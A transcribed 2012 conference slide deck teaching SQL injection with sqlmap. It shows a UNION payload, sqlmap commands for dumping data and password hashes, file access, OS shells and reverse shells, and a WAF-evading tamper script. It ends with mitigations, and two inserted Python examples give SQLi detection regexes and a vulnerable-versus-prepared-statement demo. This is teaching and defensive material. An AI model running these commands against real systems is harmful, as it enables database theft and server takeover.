Sql injection with sqlmap
Slides that I used when I presented @ Confraria VI and Security&IT in November 2012
1. SQL injection with sqlmap
   Herman Duarte <hcoduarte@gmail.com>
   Tuesday, December 4, 12
2. About me
   - Consultant @ INTEGRITY S.A. - www.integrity.pt
   - Penetration testing engagements
   - BSc in Information Systems and Computer Engineering
   - CISSP Associate / ISO27001LA / CCNA
   - Security addict :)
3. Roadmap
   - SQL injection (SQLi) 101
   - sqlmap
   - Mitigation techniques
   - Wrap-up
4. SQLi 101: Definition
   Definition: SQL injection occurs when it is possible to inject SQL commands into data-plane input in order to affect the execution of predefined SQL statements.
   It affects any application that uses non-sanitized user-supplied input in dynamic SQL query construction (e.g. web apps, fat clients).
   Cause: bad programming practices + lack of knowledge/awareness
5. SQLi 101: Structure
   ...?name=robert' union all select null,@@version,null #
   Prefix: '    Payload: union all select null,@@version,null    Suffix: #

   $query = "SELECT name,status,age FROM user WHERE name='" . $_REQUEST['search'] . "' AND age > 42";
6. sqlmap
   - Developed in Python
   - Prerequisites to run sqlmap: Python 2.6.x or 2.7.x
   - To install: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap
   - To update: python sqlmap.py --update  (or: git pull)
7. sqlmap
   Mainly developed by:
   - Bernardo Damele A.G. (@inquisb)
   - Miroslav Stampar (@stamparm)
8. sqlmap: Scenarios
   - Find and explore SQL injection in web applications
   - Direct connection (a database account is needed, and the DBMS Python binding must be installed, e.g. PyMySQL):
     -d <dbms>://<user>:<password>@<ip>:<port>/<db_name>
9. sqlmap: Workflow
   - Select your target
   - Identify possible injection points
   - Identify SQLi vulnerabilities: by using sqlmap, or by manual testing :)
   - Exploit SQLi vulnerabilities: enumerate, file system access, OS pwnage, own the internal network (w00t! w00t!)
10. sqlmap: Target selection
   - -u "<url>" (e.g. https://webapp.com/news.php?id=1)
   - -r <request file>, e.g.:

     GET /news.php?id=1&Submit=Submit HTTP/1.1
     Host: webapp.com
     User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-us,en;q=0.5
     Accept-Encoding: gzip, deflate
     Proxy-Connection: keep-alive
     Referer: https://webapp.com/index.php
     Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777;
     DNT: 1
11. sqlmap: Injection points
   - GET parameters
   - POST parameters
   - Cookie header values (only if --level >= 2)
   - User-Agent header value (only if --level >= 3)
   - Referer header value (only if --level >= 3)
12. sqlmap: Finding SQLi (I)
   ./sqlmap.py -u "https://webapp.com/news.php?id=1"
   or
   ./sqlmap.py -r news_get_request --force-ssl

   Default behavior: tests all GET and/or POST parameters, for all SQLi types, for all databases (if the DBMS is not discovered during the tests).
   Yes, it may take a long time, and it still doesn't cover all the tests sqlmap can do.
13. sqlmap: Finding SQLi (II)
   - --level=<level> (1...5, default is 1)
     With --level=5 every combination of payload, prefix and suffix will be tested on all available injection points (noisier, but gives more coverage)
   - --risk=<risk> (0...3, default is 1)
     Tests using OR need --risk=3. Why? Imagine this:
     UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1#
   - -p <param to test>[,<param to test>]
14. sqlmap: SQLi techniques/types
   --technique=SU (default is all of them: BEUST)
   - Boolean-based blind: based on page changes, data is inferred char by char
   - Error-based: uses the errors that are displayed to extract data
   - Union query-based: changes the SQL queries to extract data
   - Stacked queries: semi-colons are used to inject multiple statements into the SQL query
   - Time-based blind: based on response time, data is inferred char by char
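A defender-side counterpart to the five technique families above, added here as an example and not taken from the deck or from sqlmap: it URL-decodes the request line of constructed access-log entries and reports which technique markers appear. The patterns are illustrative assumptions (one marker per family), not sqlmap's actual payload list.

```python
import re
from urllib.parse import unquote_plus

# One illustrative marker per technique family named on the slide (B/E/U/S/T).
# These are assumptions for the example, not sqlmap's real payloads.
TECHNIQUES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\b(EXTRACTVALUE|UPDATEXML|CONVERT)\s*\(", re.I),
    "union query-based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "stacked queries": re.compile(r";\s*(SELECT|UPDATE|INSERT|DELETE|EXEC)\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.I),
}

# Pulls the request line out of a common-log-format entry.
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def classify(line):
    """Return the technique families whose markers appear in the URL-decoded
    request path of one log line, or an empty list for a clean line."""
    m = LOG_LINE.search(line)
    if not m:
        return []
    decoded = unquote_plus(m.group("path"))
    return [name for name, rx in TECHNIQUES.items() if rx.search(decoded)]


def scan(lines):
    """Return (families, line) pairs for every line that matched something."""
    hits = []
    for line in lines:
        found = classify(line)
        if found:
            hits.append((found, line))
    return hits


# Constructed sample access-log lines (not from the slides).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Dec/2012:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [04/Dec/2012:10:00:02 +0000] "GET /news.php?id=1%20AND%201=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [04/Dec/2012:10:00:03 +0000] "GET /news.php?id=1%20UNION%20ALL%20SELECT%20NULL,@@version,NULL%23 HTTP/1.1" 200 640',
    '10.0.0.5 - - [04/Dec/2012:10:00:04 +0000] "GET /news.php?id=1;SELECT%20SLEEP(5) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for families, line in scan(SAMPLE_LOG):
        print(", ".join(families), "<-", line)
```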
15. sqlmap: Supported DBMSs
   --dbms=mssql | mysql | postgresql | oracle ...
   - Microsoft SQL Server
   - MySQL
   - PostgreSQL
   - Oracle
   - IBM DB2
   - SAP MaxDB
   - Sybase
   - Firebird
   - SQLite
   - Microsoft Access
16. sqlmap: Logging / Verbosity
   - Log all HTTP traffic to a text file: -t <output file>
   - Save the options used on the command line: --save <file>
   - Verbosity: -v <0..6> (default 1); -v 6 is the same as -t, but output goes to the console
17. sqlmap: Enumeration (I)
   Objective: get data from the DBMS tables (limited to the privileges the current DBMS user has)
   What can you get:
   - DBMS exact version, O.S. information, architecture and patch level: -f
   - DBMS banner: -b
   - DBMS server hostname: --hostname
   - DBMS user the application is using: --current-user
   - Application's current DB: --current-db
   - Whether the current user is a DBA: --is-dba
18. sqlmap: Enumeration (II)
   What can you get: ...
   - List the DBMS users: --users
   - List all DBMS users' password hashes: --passwords (sqlmap will automatically try to crack the hashes with a dictionary attack)
   - List users' privileges: --privileges
   - List all available databases: --dbs
   - List all tables, or just those of a specific database: --tables (-D <database name>)
19. sqlmap: Enumeration (III)
   What can you get: ...
   - List all columns, or just those of a specific table in a database: --columns (-T <table name> -D <db name>)
   - Count table entries: --count
   - Dump data from a database/table/column: --dump (-D, -T, -C can be used to select what data to dump)
   - --dump-all (I don't recommend it)
   - Search for a database, table or column name, or part of one: --search (-D, -T, -C to specify what to search for)
20. sqlmap: Enumeration (IV)
   What can you get: ...
   - Execute a custom SQL query: --sql-query="<sql query to execute>"
   - Interactive SQL shell to execute all your custom SQL queries: --sql-shell
21. sqlmap: File system access
   Objective: read and write any textual or binary file on the DBMS O.S.
   Prerequisites:
   - DBMS = mssql | mysql | postgresql
   - Current DBMS user must have the necessary privileges
   Read: --file-read="<file path>"
   Write: --file-write="<file local path>" --file-dest="<remote file location path>"
22. sqlmap: OS pwnage (I)
   Objective: get access to the DBMS O.S. and the internal network (if the DBMS server is in the internal network)
   Prerequisites:
   - DBMS = mssql | mysql | postgresql
   - Current DBMS user must have the necessary privileges
   What can you do?
   - Get a reverse shell if the DB can connect to the internet or ping your server (yes, an ICMP shell :))
   - Establish a VNC connection
23. sqlmap: OS pwnage (II)
   - To execute an OS command: --os-cmd="<command to execute>"
   - To get an OS shell: --os-shell
   - To get a Meterpreter shell, an ICMP shell or VNC: --os-pwn --msf-path="<msf path>"
   - Stored procedure privilege escalation (buffer overflow): --bof
24. sqlmap: Tamper scripts
   Tamper scripts: --tamper <script file path>[,<script file path>]
   tamper/bluecoat.py:

     import re

     def tamper(payload, headers=None):
         """
         Example:
             * Input:  SELECT id FROM users where id = 1
             * Output: SELECT%09id FROM users where id LIKE 1

         Requirement:
             * MySQL, Blue Coat SGOS with WAF activated as documented in
               https://kb.bluecoat.com/index?page=content&id=FAQ2147
         """
         retVal = payload

         if payload:
             # replace the blank after the SQL keyword with a tab (%09 once URL-encoded)
             retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
             # replace '=' with the LIKE operator
             retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)

         return retVal
25. sqlmap: DEMO
26. sqlmap: Tips
   - If HTTPS is being used, don't forget to set: --force-ssl
   - Get as much info as you can before starting to look for SQLi vulnerabilities. It will save you time.
   - Union-based gives more data with fewer requests; use it.
   - Time-based blind SQLi is faster to check than union query-based (in cases where a lot of columns are used).
   - If --is-dba is true and --technique=S works, you can start to Gangnam Style.
27. Mitigation Techniques
   - Sanitize input
   - Use prepared statements / bind variables
   - Configure DBMS users with the least-privilege principle in mind
   - Use generic errors; don't pass them to the user
   - If the web application source code can't be changed, a proxy can be used between the web server and the database server (e.g. GreenSQL)
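The dynamic query from the SQLi 101 structure slide beside the prepared-statement fix recommended above, as an added example that is not from the deck or from sqlmap. It assumes SQLite instead of MySQL, so the slide's payload uses sqlite_version() and the -- comment in place of @@version and #, and the user rows are constructed.

```python
import sqlite3

# Constructed sample rows for an in-memory database (not from the slides).
SEED = [("robert", "active", 51), ("alice", "locked", 45), ("bob", "active", 30)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, status TEXT, age INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SEED)
    return conn


def search_vulnerable(conn, search):
    """Query built like the slide's $query: prefix + raw user input + suffix,
    so whatever the user sends is parsed as SQL."""
    query = ("SELECT name,status,age FROM user WHERE name='" + search
             + "' AND age > 42")
    return conn.execute(query).fetchall()


def search_prepared(conn, search):
    """Same query as a prepared statement: the input is bound as a value and
    can never change the statement's structure."""
    query = "SELECT name,status,age FROM user WHERE name=? AND age > 42"
    return conn.execute(query, (search,)).fetchall()


# The slide's payload, rewritten for SQLite (assumption: sqlite_version() for
# @@version and '--' for MySQL's '#' comment). The prefix "'" closes the
# string literal, the suffix "--" discards the original " AND age > 42".
PAYLOAD = "robert' union all select null,sqlite_version(),null --"

if __name__ == "__main__":
    conn = make_db()
    print(search_vulnerable(conn, "robert"))   # the intended single row
    print(search_vulnerable(conn, PAYLOAD))    # extra row: version leaks via 'status'
    print(search_prepared(conn, PAYLOAD))      # [] - no user has that literal name
```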
28. Wrap-up
   - Input sanitization
   - Use prepared statements
   - Least-privilege principle is your friend (use it!)
   - Have I said to use prepared statements?! :)
   - Do code reviews
29. References
   - https://sqlmap.org
   - Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857
   - SQL Injection Attacks and Defenses - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
30. Thank You! Q&A
   Herman Duarte
   @hdontwit
   https://www.linkedin.com/in/hcoduarte
   hcoduarte@gmail.com